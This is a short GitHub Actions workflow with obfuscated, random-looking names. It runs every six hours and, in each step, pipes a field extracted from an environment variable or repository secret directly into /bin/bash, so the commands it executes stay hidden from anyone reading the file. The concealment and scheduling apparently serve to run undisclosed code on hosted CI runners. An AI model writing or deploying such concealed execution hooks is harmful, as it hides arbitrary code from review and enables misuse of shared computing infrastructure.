name: zhangshuying7654

on:
  workflow_dispatch:
  schedule:
    - cron: '1 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhangshuying7654
        env:
          vxp12874: ${{ secrets.vxp12874 }}
        run: |
          echo $vxp12874 | jq -r .n910 | /bin/bash
          echo $bnwic95 | jq -r .agj30 | /bin/bash
          echo $lb6 | jq -r .q8216 | /bin/bash
          echo $pv101 | jq -r .e39 | /bin/bash
          echo $oy14 | jq -r .p5 | /bin/bash
          echo $wvdvq793 | jq -r .c39 | /bin/bash

